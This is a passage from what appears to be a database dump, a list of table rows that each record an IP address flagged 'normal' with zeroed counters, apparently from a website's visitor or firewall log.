0,'[]'),(3560,'165.22.198.112','normal','',0,0,0,0,0,'[]'),(3561,'91.208.99.2','normal','',0,0,0,0,0,'[]'),(3562,'173.247.248.182','normal','',0,0,0,0,0,'[]'),(3563,'3.238.145.66','normal','',0,0,0,0,0,'[]'),(3564,'34.68.76.32','normal','',0,0,0,0,0,'[]'),(3565,'2.58.47.203','normal','',0,0,0,0,0,'[]'),(3566,'27.72.145.33','normal','',0,0,0,0,0,'[]'),(3567,'207.200.8.180','normal','',0,0,0,0,0,'[]'),(3568,'14.225.255.250','normal','',0,0,0,0,0,'[]'),(3569,'173.236.184.116','normal','',0,0,0,0,0,'[]'),(3570,'51.142.148.198','normal','',0,0,0,0,0,'[]'),(3571,'198.46.93.129','normal','',0,0,0,0,0,'[]'),(3572,'54.90.50.53','normal','',0,0,0,0,0,'[]'),(3573,'208.113.198.121','normal','',0,0,0,0,0,'[]'),(3574,'75.119.135.205','normal','',0,0,0,0,0,'[]'),(3575,'207.244.229.40','normal','',0,0,0,0,0,'[]'),(3576,'162.215.12.182','normal','',0,0,0,0,0,'[]'),(3577,'77.111.247.30','normal','',0,0,0,0,0,'[]'),(3578,'77.111.247.10','normal','',0,0,0,0,0,'[]'),(3579,'157.230.15.115','normal','',0,0,0,0,0,'[]'),(3580,'114.119.129.7','normal','',0,0,0,0,0,'[]'),(3581,'161.97.142.55','normal','',0,0,0,0,0,'[]'),(3582,'3.90.82.79','normal','',0,0,0,0,0,'[]'),(3583,'164.52.208.110','normal','',0,0,0,0,0,'[]'),(3584,'139.180.186.240','normal','',0,0,0,0,0,'[]'),(3585,'41.202.168.17','normal','',0,0,0,0,0,'[]'),(3586,'159.69.8.8','normal','',0,0,0,0,0,'[]'),(3587,'158.115.228.218','normal','',0,0,0,0,0,'[]'),(3588,'141.193.96.184','normal','',0,0,0,0,0,'[]'),(3589,'34.172.119.108','normal','',0,0,0,0,0,'[]'),(3590,'104.198.160.74','normal','',0,0,0,0,0,'[]'),(3591,'34.122.37.248','normal','',0,0,0,0,0,'[]'),(3592,'159.65.241.136','normal','',0,0,0,0,0,'[]'),(3593,'177.67.89.84','normal','',0,0,0,0,0,'[]'),(3594,'156.146.57.62','normal','',0,0,0,0,0,'[]'),(3595,'54.242.165.241','normal','',0,0,0,0,0,'[]'),(3596,'217.113.194.81','normal','',0,0,0,0,0,'[]'),(3597,'217.113.194.231','normal','',0,0,0,0,0,'[]'),(3598,'217.113.194.1','normal','',0,0,0,0,0,'[]'),(3599,'217.113.194.123','normal','',0,0,0,0,0,'[]'),(3600,'88.208.242.172','normal','',0,0,0,0,0,'[]'),(3601,'148.66.143.170','normal','',0,0,0,0,0,'[]'),(3602,'173.252.83.20','normal','',0,0,0,0,0,'[]'),(3603,'68.178.145.187','normal','',0,0,0,0,0,'[]'),(3604,'212.1.211.14','normal','',0,0,0,0,0,'[]'),(3605,'185.220.174.115','normal','',0,0,0,0,0,'[]'),(3606,'82.180.175.149','normal','',0,0,0,0,0,'[]'),(3607,'20.210.226.45','normal','',0,0,0,0,0,'[]'),(3608,'35.231.7.136','normal','',0,0,0,0,0,'[]'),(3609,'149.210.209.68','normal','',0,0,0,0,0,'[]'),(3610,'81.88.53.41','normal','',0,0,0,0,0,'[]'),(3611,'111.229.185.64','normal','',0,0,0,0,0,'[]'),(3612,'173.247.248.10','normal','',0,0,0,0,0,'[]'),(3613,'198.46.81.7','normal','',0,0,0,0,0,'[]'),(3614,'150.136.181.65','normal','',0,0,0,0,0,'[]'),(3615,'87.236.20.5','normal','',0,0,0,0,0,'[]'),(3616,'5.101.157.187','normal','',0,0,0,0,0,'[]'),(3617,'95.217.129.44','normal','',0,0,0,0,0,'[]'),(3618,'152.228.208.88','normal','',0,0,0,0,0,'[]'),(3619,'173.236.152.148','normal','',0,0,0,0,0,'[]'),(3620,'3.236.96.60','normal','',0,0,0,0,0,'[]'),(3621,'185.255.131.28','normal','',0,0,0,0,0,'[]'),(3622,'194.59.218.155','normal','',0,0,0,0,0,'[]'),(3623,'82.165.184.74','normal','',0,0,0,0,0,'[]'),(3624,'150.136.250.229','normal','',0,0,0,0,0,'[]'),(3625,'82.165.83.165','normal','',0,0,0,0,0,'[]'),(3626,'34.148.195.90','normal','',0,0,0,0,0,'[]'),(3627,'85.214.79.202','normal','',0,0,0,0,0,'[]'),(3628,'92.205.64.102','normal','',0,0,0,0,0,'[]'),(3629,'82.165.82.26','normal','',0,0,0,0,0,'[]'),(3630,'45.158.14.218','normal','',0,0,0,0,0,'[]'),(3631,'14.137.153.209','normal','',0,0,0,0,0,'[]'),(3632,'165.140.84.100','normal','',0,0,0,0,0,'[]'),(3633,'185.2.4.84','normal','',0,0,0,0,0,'[]'),(3634,'64.124.8.53','normal','',0,0,0,0,0,'[]'),(3635,'185.191.171.24','normal','',0,0,0,0,0,'[]'),(3636,'185.191.171.13','normal','',0,0,0,0,0,'[]'),(3637,'20.106.125.9','normal','',0,0,0,0,0,'[]'),(3638,'69.49.246.91','normal','',0,0,0,0,0,'[]'),(3639,'116.118.50.185','normal','',0,0,0,0,0,'[]'),(3640,'64.124.8.39','normal','',0,0,0,0,0,'[]'),(3641,'178.170.41.170','normal','',0,0,0,0,0,'[]'),(3642,'137.74.207.39','normal','',0,0,0,0,0,'[]'),(3643,'85.128.143.157','normal','',0,0,0,0,0,'[]'),(3644,'90.156.169.206','normal','',0,0,0,0,0,'[]'),(3645,'141.98.101.133','normal','',0,0,0,0,0,'[]'),(3646,'192.30.89.67','normal','',0,0,0,0,0,'[]'),(3647,'84.34.147.63','normal','',0,0,0,0,0,'[]'),(3648,'52.136.249.235','normal','',0,0,0,0,0,'[]'),(3649,'24.247.200.127','normal','',0,0,0,0,0,'[]'),(3650,'213.152.187.195','normal','',0,0,0,0,0,'[]'),(3651,'3.141.216.42','normal','',0,0,0,0,0,'[]'),(3652,'43.205.42.229','normal','',0,0,0,0,0,'[]'),(3653,'8.210.93.170','normal','',0,0,0,0,0,'[]'),(3654,'167.172.252.150','normal','',0,0,0,0,0,'[]'),(3655,'5.58.187.240','normal','',0,0,0,0,0,'[]'),(3656,'213.152.187.230','normal','',0,0,0,0,0,'[]'),(3657,'20.169.54.203','normal','',0,0,0,0,0,'[]'),(3658,'87.249.43.21','normal','',0,0,0,0,0,'[]'),(3659,'80.233.239.98','normal','',0,0,0,0,0,'[]'),(3660,'20.196.65.32','normal','',0,0,0,0,0,'[]'),(3661,'116.203.66.97','normal','',0,0,0,0,0,'[]'),(3662,'185.142.157.57','normal','',0,0,0,0,0,'[]'),(3663,'128.199.211.78','normal','',0,0,0,0,0,'[]'),(3664,'107.180.241.146','normal','',0,0,0,0,0,'[]'),(3665,'46.37.175.140','normal','',0,0,0,0,0,'[]'),(3666,'51.79.19.15','normal','',0,0,0,0,0,'[]'),(3667,'14.248.139.215','normal','',0,0,0,0,0,'[]'),(3668,'173.249.29.54','normal','',0,0,0,0,0,'[]'),(3669,'114.119.132.65','normal','',0,0,0,0,0,'[]'),(3670,'162.241.24.182','normal','',0,0,0,0,0,'[]'),(3671,'186.234.80.195','normal','',0,0,0,0,0,'[]'),(3672,'54.39.216.101','normal','',0,0,0,0,0,'[]'),(3673,'3.223.3.251','normal','',0,0,0,0,0,'[]'),(3674,'159.65.186.210','normal','',0,0,0,0,0,'[]'),(3675,'72.34.62.119','normal','',0,0,0,0,0,'[]'),(3676,'207.46.13.184','normal','',0,0,0,0,0,'[]'),(3677,'104.196.57.197','normal','',0,0,0,0,0,'[]'),(3678,'40.77.190.201','normal','',0,0,0,0,0,'[]'),(3679,'184.75.223.235','normal','',0,0,0,0,0,'[]'),(3680,'34.148.100.241','normal','',0,0,0,0,0,'[]'),(3681,'209.124.90.80','normal','',0,0,0,0,0,'[]'),(3682,'14.116.152.84','normal','',0,0,0,0,0,'[]'),(3683,'184.75.221.203','normal','',0,0,0,0,0,'[]'),(3684,'35.239.205.201','normal','',0,0,0,0,0,'[]'),(3685,'69.171.231.7','normal','',0,0,0,0,0,'[]'),(3686,'114.119.130.217','normal','',0,0,0,0,0,'[]'),(3687,'198.251.73.37','normal','',0,0,0,0,0,'[]'),(3688,'198.251.73.53','normal','',0,0,0,0,0,'[]'),(3689,'40.70.241.53','normal','',0,0,0,0,0,'[]'),(3690,'198.251.73.33','normal','',0,0,0,0,0,'[]'),(3691,'198.251.73.29','normal','',0,0,0,0,0,'[]'),(3692,'198.251.73.5','normal','',0,0,0,0,0,'[]'),(3693,'198.251.73.13','normal','',0,0,0,0,0,'[]'),(3694,'137.184.219.65','normal','',0,0,0,0,0,'[]'),(3695,'184.75.221.107','normal','',0,0,0,0,0,'[]'),(3696,'167.248.133.62','normal','',0,0,0,0,0,'[]'),(3697,'144.76.69.39','normal','',0,0,0,0,0,'[]'),(3698,'46.183.220.203','normal','',0,0,0,0,0,'[]'),(3699,'134.19.179.155','normal','',0,0,0,0,0,'[]'),(3700,'35.231.110.37','normal','',0,0,0,0,0,'[]'),(3701,'45.130.83.27','normal','',0,0,0,0,0,'[]'),(3702,'54.36.148.238','normal','',0,0,0,0,0,'[]'),(3703,'74.126.12.26','normal','',0,0,0,0,0,'[]'),(3704,'74.126.12.26','normal','',0,0,0,0,0,'[]'),(3705,'185.2.4.147','normal','',0,0,0,0,0,'[]'),(3706,'185.191.171.21','normal','',0,0,0,0,0,'[]'),(3707,'206.189.129.168','normal','',0,0,0,0,0,'[]'),(3708,'84.39.117.57','normal','',0,0,0,0,0,'[]'),(3709,'34.148.83.75','normal','',0,0,0,0,0,'[]'),(3710,'134.19.179.171','normal','',0,0,0,0,0,'[]'),(3711,'198.46.85.155','normal','',0,0,0,0,0,'[]'),(3712,'54.37.254.14','normal','',0,0,0,0,0,'[]'),(3713,'65.109.26.43','normal','',0,0,0,0,0,'[]'),(3714,'20.126.96.47','normal','',0,0,0,0,0,'[]'),(3715,'104.248.6.206','normal','',0,0,0,0,0,'[]'),(3716,'68.183.234.105','normal','',0,0,0,0,0,'[]'),(3717,'181.214.218.35','normal','',0,0,0,0,0,'[]'),(3718,'217.138.195.27','normal','',0,0,0,0,0,'[]'),(3719,'159.203.108.168','normal','',0,0,0,0,0,'[]'),(3720,'103.195.185.149','normal','',0,0,0,0,0,'[]'),(3721,'185.9.19.107','normal','',0,0,0,0,0,'[]'),(3722,'4.228.195.120','normal','',0,0,0,0,0,'[]'),(3723,'54.36.148.104','normal','',0,0,0,0,0,'[]'),(3724,'159.89.164.128','normal','',0,0,0,0,0,'[]'),(3725,'54.36.148.88','normal','',0,0,0,0,0,'[]'),(3726,'54.36.148.199','normal','',0,0,0,0,0,'[]'),(3727,'185.65.134.165','normal','',0,0,0,0,0,'[]'),(3728,'54.36.148.4','normal','',0,0,0,0,0,'[]'),(3729,'54.36.148.255','normal','',0,0,0,0,0,'[]'),(3730,'181.214.218.38','normal','',0,0,0,0,0,'[]'),(3731,'185.200.117.131','normal','',0,0,0,0,0,'[]'),(3732,'185.216.71.133','normal','',0,0,0,0,0,'[]'),(3733,'192.99.15.185','normal','',0,0,0,0,0,'[]'),(3734,'64.227.39.41','normal','',0,0,0,0,0,'[]'),(3735,'206.189.60.87','normal','',0,0,0,0,0,'[]'),(3736,'159.65.58.34','normal','',0,0,0,0,0,'[]'),(3737,'185.190.24.40','normal','',0,0,0,0,0,'[]'),(3738,'178.128.221.106','normal','',0,0,0,0,0,'[]'),(3739,'192.64.82.118','normal','',0,0,0,0,0,'[]'),(3740,'164.92.66.133','normal','',0,0,0,0,0,'[]'),(3741,'142.93.203.156','normal','',0,0,0,0,0,'[]'),(3742,'114.119.142.212','normal','',0,0,0,0,0,'[]'),(3743,'34.138.83.10','normal','',0,0,0,0,0,'[]'),(3744,'54.36.149.41','normal','',0,0,0,0,0,'[]'),(3745,'16.162.114.74','normal','',0,0,0,0,0,'[]'),(3746,'139.28.218.235','normal','',0,0,0,0,0,'[]'),(3747,'199.249.230.7','normal','',0,0,0,0,0,'[]'),(3748,'85.31.46.39','normal','',0,0,0,0,0,'[]'),(3749,'14.29.247.201','normal','',0,0,0,0,0,'[]'),(3750,'51.178.138.5','normal','',0,0,0,0,0,'[]'),(3751,'51.132.0.90','normal','',0,0,0,0,0,'[]'),(3752,'34.67.32.233','normal','',0,0,0,0,0,'[]'),(3753,'34.74.168.122','normal','',0,0,0,0,0,'[]'),(3754,'40.77.167.106','normal','',0,0,0,0,0,'[]'),(3755,'213.152.161.20','normal','',0,0,0,0,0,'[]'),(3756,'166.0.235.97','normal','',0,0,0,0,0,'[]'),(3757,'95.108.213.13','normal','',0,0,0,0,0,'[]'),(3758,'213.152.161.25','normal','',0,0,0,0,0,'[]'),(3759,'188.166.120.27','normal','',0,0,0,0,0,'[]'),(3760,'193.37.254.27','normal','',0,0,0,0,0,'[]'),(3761,'149.56.226.67','normal','',0,0,0,0,0,'[]'),(3762,'185.189.112.11','normal','',0,0,0,0,0,'[]'),(3763,'209.58.183.78','normal','',0,0,0,0,0,'[]'),(3764,'124.223.196.102','normal','',0,0,0,0,0,'[]'),(3765,'199.250.223.180','normal','',0,0,0,0,0,'[]'),(3766,'87.250.224.33','normal','',0,0,0,0,0,'[]'),(3767,'156.146.63.148','normal','',0,0,0,0,0,'[]'),(3768,'20.38.34.127','normal','',0,0,0,0,0,'[]'),(3769,'185.190.142.217','normal','',0,0,0,0,0,'[]'),(3770,'46.105.29.21','normal','',0,0,0,0,0,'[]'),(3771,'34.148.149.247','normal','',0,0,0,0,0,'[]'),(3772,'54.36.149.62','normal','',0,0,0,0,0,'[]'),(3773,'77.39.212.31','normal','',0,0,0,0,0,'[]'),(3774,'64.42.179.51','normal','',0,0,0,0,0,'[]'),(3775,'173.231.60.197','normal','',0,0,0,0,0,'[]'),(3776,'162.241.60.246','normal','',0,0,0,0,0,'[]'),(3777,'54.36.149.53','normal','',0,0,0,0,0,'[]'),(3778,'66.249.69.59','normal','',0,0,0,0,0,'[]'),(3779,'66.249.72.162','normal','',0,0,0,0,0,'[]'),(3780,'66.249.69.57','normal','',0,0,0,0,0,'[]'),(3781,'54.36.148.171','normal','',0,0,0,0,0,'[]'),(3782,'103.28.36.205','normal','',0,0,0,0,0,'[]'),(3783,'64.227.162.186','normal','',0,0,0,0,0,'[]'),(3784,'110.40.133.172','normal','',0,0,0,0,0,'[]'),(3785,'45.130.83.44','normal','',0,0,0,0,0,'[]'),(3786,'3.110.180.235','normal','',0,0,0,0,0,'[]'),(3787,'137.184.124.136','normal','',0,0,0,0,0,'[]'),(3788,'103.160.37.174','normal','',0,0,0,0,0,'[]'),(3789,'3.133.86.42','normal','',0,0,0,0,0,'[]'),(3790,'18.222.38.78','normal','',0,0,0,0,0,'[]'),(3791,'188.143.235.92','normal','',0,0,0,0,0,'[]'),(3792,'172.105.223.163','normal','',0,0,0,0,0,'[]'),(3793,'68.235.48.108','normal','',0,0,0,0,0,'[]'),(3794,'20.5.104.175','normal','',0,0,0,0,0,'[]'),(3795,'157.245.126.112','normal','',0,0,0,0,0,'[]'),(3796,'45.130.83.34','normal','',0,0,0,0,0,'[]'),(3797,'3.133.136.238','normal','',0,0,0,0,0,'[]'),(3798,'139.59.6.209','normal','',0,0,0,0,0,'[]'),(3799,'38.242.221.235','normal','',0,0,0,0,0,'[]'),(3800,'159.65.129.186','normal','',0,0,0,0,0,'[]'),(3801,'167.172.166.178','normal','',0,0,0,0,0,'[]'),(3802,'184.75.221.195','normal','',0,0,0,0,0,'[]'),(3803,'217.64.127.195','normal','',0,0,0,0,0,'[]'),(3804,'134.19.179.187','normal','',0,0,0,0,0,'[]'),(3805,'35.227.23.138','normal','',0,0,0,0,0,'[]'),(3806,'54.36.148.152','normal','',0,0,0,0,0,'[]'),(3807,'114.119.147.237','normal','',0,0,0,0,0,'[]'),(3808,'185.200.116.203','normal','',0,0,0,0,0,'[]'),(3809,'34.170.212.198','normal','',0,0,0,0,0,'[]'),(3810,'185.27.99.125','normal','',0,0,0,0,0,'[]'),(3811,'185.27.99.135','normal','',0,0,0,0,0,'[]'),(3812,'185.27.99.136','normal','',0,0,0,0,0,'[]'),(3813,'178.162.204.238','normal','',0,0,0,0,0,'[]'),(3814,'37.120.155.179','normal','',0,0,0,0,0,'[]'),(3815,'54.67.66.32','normal','',0,0,0,0,0,'[]'),(3816,'20.0.203.181','normal','',0,0,0,0,0,'[]'),(3817,'213.152.162.170','normal','',0,0,0,0,0,'[]'),(3818,'54.36.148.96','normal','',0,0,0,0,0,'[]'),(3819,'185.3.164.156','normal','',0,0,0,0,0,'[]'),(3820,'34.139.213.96','normal','',0,0,0,0,0,'[]'),(3821,'114.119.133.85','normal','',0,0,0,0,0,'[]'),(3822,'91.142.85.32','normal','',0,0,0,0,0,'[]'),(3823,'91.142.85.32','normal','',0,0,0,0,0,'[]'),(3824,'173.252.83.13','normal','',0,0,0,0,0,'[]'),(3825,'66.249.69.61','normal','',0,0,0,0,0,'[]'),(3826,'173.252.83.4','normal','',0,0,0,0,0,'[]'),(3827,'195.110.210.107','normal','',0,0,0,0,0,'[]'),(3828,'193.235.141.172','normal','',0,0,0,0,0,'[]'),(3829,'5.188.29.168','normal','',0,0,0,0,0,'[]'),(3830,'167.248.133.117','normal','',0,0,0,0,0,'[]'),(3831,'167.248.133.117','normal','',0,0,0,0,0,'[]'),(3832,'5.189.171.179','normal','',0,0,0,0,0,'[]'),(3833,'138.68.180.230','normal','',0,0,0,0,0,'[]'),(3834,'87.101.92.171','normal','',0,0,0,0,0,'[]'),(3835,'142.93.182.118','normal','',0,0,0,0,0,'[]'),(3836,'159.65.255.246','normal','',0,0,0,0,0,'[]'),(3837,'74.220.219.213','normal','',0,0,0,0,0,'[]'),(3838,'134.122.12.180','normal','',0,0,0,0,0,'[]'),(3839,'162.241.248.14','normal','',0,0,0,0,0,'[]'),(3840,'139.99.71.253','normal','',0,0,0,0,0,'[]'),(3841,'36.92.1.31','normal','',0,0,0,0,0,'[]'),(3842,'54.36.148.39','normal','',0,0,0,0,0,'[]'),(3843,'185.76.77.160','normal','',0,0,0,0,0,'[]'),(3844,'34.138.205.25','normal','',0,0,0,0,0,'[]'),(3845,'181.214.218.60','normal','',0,0,0,0,0,'[]'),(3846,'185.45.66.25','normal','',0,0,0,0,0,'[]'),(3847,'54.36.149.44','normal','',0,0,0,0,0,'[]'),(3848,'35.206.169.219','normal','',0,0,0,0,0,'[]'),(3849,'212.90.16.50','normal','',0,0,0,0,0,'[]'),(3850,'35.206.189.245','normal','',0,0,0,0,0,'[]'),(3851,'82.102.27.171','normal','',0,0,0,0,0,'[]'),(3852,'181.214.218.71','normal','',0,0,0,0,0,'[]'),(3853,'34.73.5.36','normal','',0,0,0,0,0,'[]'),(3854,'134.19.179.243','normal','',0,0,0,0,0,'[]'),(3855,'107.167.244.51','normal','',0,0,0,0,0,'[]'),(3856,'20.118.129.10','normal','',0,0,0,0,0,'[]'),(3857,'118.34.144.101','normal','',0,0,0,0,0,'[]'),(3858,'65.108.127.5','normal','',0,0,0,0,0,'[]'),(3859,'107.116.89.104','normal','',0,0,0,0,0,'[]'),(3860,'107.116.89.104','normal','',0,0,0,0,0,'[]'),(3861,'44.21.187.112','normal','',0,0,0,0,0,'[]'),(3862,'162.240.30.198','normal','',0,0,0,0,0,'[]'),(3863,'34.139.56.133','normal','',0,0,0,0,0,'[]'),(3864,'49.12.209.135','normal','',0,0,0,0,0,'[]'),(3865,'20.150.138.78','normal','',0,0,0,0,0,'[]'),(3866,'103.221.220.140','normal','',0,0,0,0,0,'[]'),(3867,'35.217.43.61','normal','',0,0,0,0,0,'[]'),(3868,'35.214.190.203','normal','',0,0,0,0,0,'[]'),(3869,'103.254.12.61','normal','',0,0,0,0,0,'[]'),(3870,'5.189.178.166','normal','',0,0,0,0,0,'[]'),(3871,'37.139.53.50','normal','',0,0,0,0,0,'[]'),(3872,'185.220.101.28','normal','',0,0,0,0,0,'[]'),(3873,'199.249.230.143','normal','',0,0,0,0,0,'[]'),(3874,'114.119.151.14','normal','',0,0,0,0,0,'[]'),(3875,'43.251.135.37','normal','',0,0,0,0,0,'[]'),(3876,'192.30.89.75','normal','',0,0,0,0,0,'[]'),(3877,'51.142.90.138','normal','',0,0,0,0,0,'[]'),(3878,'14.116.157.23','normal','',0,0,0,0,0,'[]'),(3879,'185.252.31.59','normal','',0,0,0,0,0,'[]'),(3880,'5.198.129.73','normal','',0,0,0,0,0,'[]'),(3881,'20.150.146.176','normal','',0,0,0,0,0,'[]'),(3882,'49.128.186.91','normal','',0,0,0,0,0,'[]'),(3883,'81.17.57.144','normal','',0,0,0,0,0,'[]'),(3884,'54.37.74.123','normal','',0,0,0,0,0,'[]'),(3885,'119.18.49.12','normal','',0,0,0,0,0,'[]'),(3886,'18.29.102.135','normal','',0,0,0,0,0,'[]'),(3887,'81.95.96.180','normal','',0,0,0,0,0,'[]'),(3888,'13.234.117.78','normal','',0,0,0,0,0,'[]'),(3889,'66.94.117.33','normal','',0,0,0,0,0,'[]'),(3890,'34.219.58.126','normal','',0,0,0,0,0,'[]'),(3891,'35.90.97.46','normal','',0,0,0,0,0,'[]'),(3892,'54.200.186.243','normal','',0,0,0,0,0,'[]'),(3893,'54.36.148.241','normal','',0,0,0,0,0,'[]'),(3894,'50.87.248.38','normal','',0,0,0,0,0,'[]'),(3895,'35.231.240.156','normal','',0,0,0,0,0,'[]'),(3896,'143.244.162.250','normal','',0,0,0,0,0,'[]'),(3897,'54.36.148.7','normal','',0,0,0,0,0,'[]'),(3898,'54.36.149.72','normal','',0,0,0,0,0,'[]'),(3899,'191.101.217.26','normal','',0,0,0,0,0,'[]'),(3900,'54.36.149.18','normal','',0,0,0,0,0,'[]'),(3901,'20.92.87.77','normal','',0,0,0,0,0,'[]'),(3902,'192.145.126.115','normal','',0,0,0,0,0,'[]'),(3903,'165.27.189.18','normal','',0,0,0,0,0,'[]'),(3904,'158.69.246.14','normal','',0,0,0,0,0,'[]'),(3905,'34.139.11.228','normal','',0,0,0,0,0,'[]'),(3906,'104.40.134.55','normal','',0,0,0,0,0,'[]'),(3907,'192.30.89.51','normal','',0,0,0,0,0,'[]'),(3908,'174.140.244.38','normal','',0,0,0,0,0,'[]'),(3909,'54.36.182.160','normal','',0,0,0,0,0,'[]'),(3910,'198.46.81.19','normal','',0,0,0,0,0,'[]'),(3911,'11.27.188.158','normal','',0,0,0,0,0,'[]'),(3912,'77.65.212.122','normal','',0,0,0,0,0,'[]'),(3913,'136.243.19.225','normal','',0,0,0,0,0,'[]'),(3914,'94.198.43.10','normal','',0,0,0,0,0,'[]'),(3915,'101.68.211.2','normal','',0,0,0,0,0,'[]'),(3916,'162.55.55.15','normal','',0,0,0,0,0,'[]'),(3917,'195.178.120.27','normal','',0,0,0,0,0,'[]'),(3918,'146.70.115.219','normal','',0,0,0,0,0,'[]'),(3919,'34.170.36.88','normal','',0,0,0,0,0,'[]'),(3920,'218.17.176.98','normal','',0,0,0,0,0,'[]'),(3921,'95.217.147.17','normal','',0,0,0,0,0,'[]'),(3922,'149.248.59.66','normal','',0,0,0,0,0,'[]'),(3923,'138.68.147.16','normal','',0,0,0,0,0,'[]'),(3924,'223.247.178.167','normal','',0,0,0,0,0,'[]'),(3925,'20.83.189.255','normal','',0,0,0,0,0,'[]'),(3926,'175.6.77.241','normal','',0,0,0,0,0,'[]'),(3927,'125.124.121.163','normal','',0,0,0,0,0,'[]'),(3928,'117.33.140.12','normal','',0,0,0,0,0,'[]'),(3929,'108.167.189.59','normal','',0,0,0,0,0,'[]'),(3930,'157.245.140.35','normal','',0,0,0,0,0,'[]'),(3931,'64.111.127.191','normal','',0,0,0,0,0,'[]'),(3932,'108.179.193.190','normal','',0,0,0,0,0,'[]'),(3933,'125.212.241.69','normal','',0,0,0,0,0,'[]'),(3934,'173.252.83.21','normal','',0,0,0,0,0,'[]'),(3935,'199.244.88.223','normal','',0,0,0,0,0,'[]'),(3936,'199.244.88.221','normal','',0,0,0,0,0,'[]'),(3937,'40.77.202.100','normal','',0,0,0,0,0,'[]'),(3938,'3.91.221.110','normal','',0,0,0,0,0,'[]'),(3939,'167.172.56.36','normal','',0,0,0,0,0,'[]'),(3940,'168.138.28.119','normal','',0,0,0,0,0,'[]'),(3941,'185.191.171.15','normal','',0,0,0,0,0,'[]'),(3942,'54.244.77.128','normal','',0,0,0,0,0,'[]'),(3943,'34.208.209.51','normal','',0,0,0,0,0,'[]'),(3944,'34.170.254.201','normal','',0,0,0,0,0,'[]'),(3945,'34.74.215.68','normal','',0,0,0,0,0,'[]'),(3946,'185.191.171.7','normal','',0,0,0,0,0,'[]'),(3947,'35.196.54.224','normal','',0,0,0,0,0,'[]'),(3948,'35.197.5.130','normal','',0,0,0,0,0,'[]'),(3949,'196.244.192.38','normal','',0,0,0,0,0,'[]'),(3950,'167.99.142.204','normal','',0,0,0,0,0,'[]'),(3951,'44.211.165.123','normal','',0,0,0,0,0,'[]'),(3952,'185.191.171.19','normal','',0,0,0,0,0,'[]'),(3953,'34.204.197.67','normal','',0,0,0,0,0,'[]'),(3954,'176.9.74.94','normal','',0,0,0,0,0,'[]'),(3955,'154.6.22.36','normal','',0,0,0,0,0,'[]'),(3956,'235.226.248.190','normal','',0,0,0,0,0,'[]'),(3957,'75.101.226.96','normal','',0,0,0,0,0,'[]'),(3958,'103.57.222.214','normal','',0,0,0,0,0,'[]'),(3959,'185.207.31.97','normal','',0,0,0,0,0,'[]'),(3960,'161.207.69.162','normal','',0,0,0,0,0,'[]'),(3961,'163.44.198.57','normal','',0,0,0,0,0,'[]'),(3962,'100.26.210.34','normal','',0,0,0,0,0,'[]'),(3963,'188.11.70.192','normal','',0,0,0,0,0,'[]'),(3964,'34.138.1.235','normal','',0,0,0,0,0,'[]'),(3965,'80.76.51.212','normal','',0,0,0,0,0,'[]'),(3966,'185.156.174.115','normal','',0,0,0,0,0,'[]'),(3967,'178.162.212.214','normal','',0,0,0,0,0,'[]'),(3968,'89.238.166.235','normal','',0,0,0,0,0,'[]'),(3969,'208.113.153.214','normal','',0,0,0,0,0,'[]'),(3970,'46.161.15.14','normal','',0,0,0,0,0,'[]'),(3971,'52.87.211.165','normal','',0,0,0,0,0,'[]'),(3972,'184.75.221.43','normal','',0,0,0,0,0,'[]'),(3973,'213.152.162.15','normal','',0,0,0,0,0,'[]'),(3974,'44.208.152.20','normal','',0,0,0,0,0,'[]'),(3975,'91.250.116.80','normal','',0,0,0,0,0,'[]'),(3976,'35.153.203.125','normal','',0,0,0,0,0,'[]'),(3977,'62.102.148.130','normal','',0,0,0,0,0,'[]'),(3978,'13.232.82.105','normal','',0,0,0,0,0,'[]'),(3979,'104.222.170.236','normal','',0,0,0,0,0,'[]'),(3980,'194.71.247.204','normal','',0,0,0,0,0,'[]'),(3981,'178.73.253.114','normal','',0,0,0,0,0,'[]'),(3982,'192.165.113.29','normal','',0,0,0,0,0,'[]'),(3983,'104.222.170.34','normal','',0,0,0,0,0,'[]'),(3984,'194.71.247.204','normal','',0,0,0,0,0,'[]'),(3985,'5.133.213.82','normal','',0,0,0,0,0,'[]'),(3986,'5.133.210.121','normal','',0,0,0,0,0,'[]'),(3987,'178.73.232.235','normal','',0,0,0,0,0,'[]'),(3988,'185.116.240.137','normal','',0,0,0,0,0,'[]'),(3989,'104.222.169.196','normal','',0,0,0,0,0,'[]'),(3990,'20.127.235.240','normal','',0,0,0,0,0,'[]'),(3991,'181.214.218.74','normal','',0,0,0,0,0,'[]'),(3992,'34.71.63.205','normal','',0,0,0,0,0,'[]'),(3993,'50.232.143.220','normal','',0,0,0,0,0,'[]'),(3994,'41.53.70.234','normal','',0,0,0,0,0,'[]'),(3995,'20.123.80.197','normal','',0,0,0,0,0,'[]'),(3996,'198.211.125.40','normal','',0,0,0,0,0,'[]'),(3997,'162.241.85.212','normal','',0,0,0,0,0,'[]'),(3998,'65.0.178.38','normal','',0,0,0,0,0,'[]'),(3999,'64.246.165.180','normal','',0,0,0,0,0,'[]'),(4000,'190.55.246.195','normal','',0,0,0,0,0,'[]'),(4001,'172.104.219.25','normal','',0,0,0,0,0,'[]'),(4002,'144.91.88.30','normal','',0,0,0,0,0,'[]'),(4003,'114.119.140.79','normal','',0,0,0,0,0,'[]'),(4004,'46.161.14.84','normal','',0,0,0,0,0,'[]'),(4005,'43.231.112.85','normal','',0,0,0,0,0,'[]'),(4006,'54.36.149.84','normal','',0,0,0,0,0,'[]'),(4007,'34.213.32.204','normal','',0,0,0,0,0,'[]'),(4008,'52.12.75.61','normal','',0,0,0,0,0,'[]'),(4009,'136.92.155.47','normal','',0,0,0,0,0,'[]'),(4010,'34.215.183.141','normal','',0,0,0,0,0,'[]'),(4011,'3.231.29.90','normal','',0,0,0,0,0,'[]'),(4012,'3.231.29.90','normal','',0,0,0,0,0,'[]'),(4013,'153.232.197.201','normal','',0,0,0,0,0,'[]'),(4014,'170.242.41.4','normal','',0,0,0,0,0,'[]'),(4015,'167.94.138.44','normal','',0,0,0,0,0,'[]'),(4016,'167.94.138.44','normal','',0,0,0,0,0,'[]'),(4017,'3.250.34.190','normal','',0,0,0,0,0,'[]'),(4018,'196.74.155.108','normal','',0,0,0,0,0,'[]'),(4019,'35.243.241.183','normal','',0,0,0,0,0,'[]'),(4020,'66.33.196.103','normal','',0,0,0,0,0,'[]'),(4021,'5.157.5.158','normal','',0,0,0,0,0,'[]'),(4022,'191.102.148.118','normal','',0,0,0,0,0,'[]'),(4023,'222.71.126.39','normal','',0,0,0,0,0,'[]'),(4024,'185.181.60.39','normal','',0,0,0,0,0,'[]'),(4025,'173.236.176.107','normal','',0,0,0,0,0,'[]'),(4026,'120.205.197.188','normal','',0,0,0,0,0,'[]'),(4027,'108.178.202.42','normal','',0,0,0,0,0,'[]'),(4028,'49.100.234.138','normal','',